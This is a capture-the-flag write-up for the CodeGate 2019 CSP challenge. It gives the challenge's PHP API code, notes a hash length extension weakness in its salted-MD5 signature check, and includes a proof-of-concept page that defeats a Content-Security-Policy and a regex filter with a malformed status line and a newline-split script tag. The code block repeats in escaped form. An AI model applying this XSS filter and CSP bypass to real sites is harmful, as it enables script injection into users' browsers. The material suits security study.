CodeGate 2019 CSP challenge writeup

## README.md

      
          Raw
        
        
              README.md
            
          
    Solution


if(md5($salt.$api_string) !== $sig){ can be bypassed with hash length extension attack (didn't do it, but the key length is 12.)


Use custom header and body to trigger CSP bypass.


## api.php
<?php
require_once 'config.php';

if(!isset($_GET["q"]) || !isset($_GET["sig"])) {
    die("?");
}

$api_string = base64_decode($_GET["q"]);
$sig = $_GET["sig"];

if(md5($salt.$api_string) !== $sig){
    die("??");
}

//APIs Format : name(b64),p1(b64),p2(b64)|name(b64),p1(b64),p2(b64) ...
$apis = explode("|", $api_string);
foreach($apis as $s) {
    $info = explode(",", $s);
    if(count($info) != 3)
        continue;
    $n = base64_decode($info[0]);
    $p1 = base64_decode($info[1]);
    $p2 = base64_decode($info[2]);

    if ($n === "header") {
        if(strlen($p1) > 10)
            continue;
        if(strpos($p1.$p2, ":") !== false || strpos($p1.$p2, "-") !== false) //Don't trick...
            continue;
        header("$p1: $p2");
    }
    elseif ($n === "cookie") {
        setcookie($p1, $p2);
    }
    elseif ($n === "body") {
        if(preg_match("/<.*>/", $p1))
            continue;
        echo $p1;
        echo "\n<br />\n";
    }
    elseif ($n === "hello") {
        echo "Hello, World!\n";
    }
}

## exploit_poc.php
<?php

header("Content-Security-Policy: default-src 'self'; script-src 'none'; base-uri 'none';");

// Try with your environment!
if($_GET['go']){
    // exploit (3)
    // 1. f**k header
    header("HTTP/1.0 123 Meh");
    // 2. use \r\n to bypass
    $encoded_payload = "<script\r\n>alert(1);\r\n</script\r\n>";
    if(preg_match("/<.*>/", $encoded_payload)){
        die("blocked");
    }
    echo $encoded_payload;
    echo "\n<br />\n";
    exit;
}

?>
<a href="?go=go">go</a>
<hr>
<?php

highlight_file("csp.php");

?>
	<?php
	require_once 'config.php';

	if(!isset($_GET["q"]) \|\| !isset($_GET["sig"])) {
	die("?");
	}

	$api_string = base64_decode($_GET["q"]);
	$sig = $_GET["sig"];

	if(md5($salt.$api_string) !== $sig){
	die("??");
	}

	//APIs Format : name(b64),p1(b64),p2(b64)\|name(b64),p1(b64),p2(b64) ...
	$apis = explode("\|", $api_string);
	foreach($apis as $s) {
	$info = explode(",", $s);
	if(count($info) != 3)
	continue;
	$n = base64_decode($info[0]);
	$p1 = base64_decode($info[1]);
	$p2 = base64_decode($info[2]);

	if ($n === "header") {
	if(strlen($p1) > 10)
	continue;
	if(strpos($p1.$p2, ":") !== false \|\| strpos($p1.$p2, "-") !== false) //Don't trick...
	continue;
	header("$p1: $p2");
	}
	elseif ($n === "cookie") {
	setcookie($p1, $p2);
	}
	elseif ($n === "body") {
	if(preg_match("/<.*>/", $p1))
	continue;
	echo $p1;
	echo "\n<br />\n";
	}
	elseif ($n === "hello") {
	echo "Hello, World!\n";
	}
	}
	<?php

	header("Content-Security-Policy: default-src 'self'; script-src 'none'; base-uri 'none';");

	// Try with your environment!
	if($_GET['go']){
	// exploit (3)
	// 1. f**k header
	header("HTTP/1.0 123 Meh");
	// 2. use \r\n to bypass
	$encoded_payload = "<script\r\n>alert(1);\r\n</script\r\n>";
	if(preg_match("/<.*>/", $encoded_payload)){
	die("blocked");
	}
	echo $encoded_payload;
	echo "\n<br />\n";
	exit;
	}

	?>
	<a href="?go=go">go</a>
	<hr>
	<?php

	highlight_file("csp.php");

	?>